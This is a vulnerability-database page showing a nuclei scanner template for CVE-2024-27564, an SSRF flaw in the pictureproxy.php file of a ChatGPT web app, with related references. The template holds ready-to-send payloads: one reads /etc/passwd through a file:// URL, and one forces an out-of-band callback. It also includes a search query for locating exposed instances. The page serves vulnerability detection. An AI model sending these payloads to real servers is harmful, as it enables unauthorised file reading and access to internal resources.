Lucene search
K

ChatGPT个人专用版 - Server Side Request Forgery

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 219 Views

ChatGPT Server Side Request Forgery - Injection of crafted URLs allows arbitrary request

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-27564
5 Mar 202418:27
circl
CNNVD
ChatGPT Code Issue Vulnerability
5 Mar 202400:00
cnnvd
CVE
CVE-2024-27564
5 Mar 202400:00
cve
Cvelist
CVE-2024-27564
5 Mar 202400:00
cvelist
GithubExploit
Exploit for Server-Side Request Forgery in Dirk1983 Chatgpt
15 Sep 202415:11
githubexploit
HackRead
Hackers Exploit ChatGPT with CVE-2024-27564, 10,000+ Attacks in a Week
17 Mar 202521:26
hackread
hivepro
7 Steps for Securing Generative AI in Enterprises
15 Nov 202522:11
hivepro
NVD
CVE-2024-27564
5 Mar 202417:15
nvd
OSV
CVE-2024-27564
5 Mar 202417:15
osv
Prion
Server side request forgery (ssrf)
5 Mar 202417:15
prion
Rows per page
id: CVE-2024-27564

info:
  name: ChatGPT个人专用版 - Server Side Request Forgery
  author: DhiyaneshDK
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
  impact: |
    Attackers can force the application to make arbitrary requests including reading local files and accessing internal resources via SSRF in the pictureproxy.php file.
  remediation: |
    Update ChatGPT个人专用版 to a version that addresses CVE-2024-27564.
  reference:
    - https://github.com/dirk1983/chatgpt/issues/114
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27564
  classification:
    epss-score: 0.40637
    epss-percentile: 0.98477
    cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: chanzhaoyu
    product: chatgpt_web
    fofa-query: "title=\"ChatGPT个人专用版\""
  tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi,vkev,vuln,ai

http:
  - method: GET
    path:
      - "{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd"
      - "{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(header, "image/jpeg")
          - regex('root:.*:0:0:', body)
        condition: and

      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
          - contains(header, "image/jpeg")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100eb0e7ad0f6e18ea5f8e3e462e940a4c3a4d946290f689c17e00283e7dbfe245902204d1d59fb940d42675019db44f0fe4ab5dc5b798a6ebc7b32d4ca203dd7f534e2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.15.8 - 6.5
EPSS0.40637
SSVC
219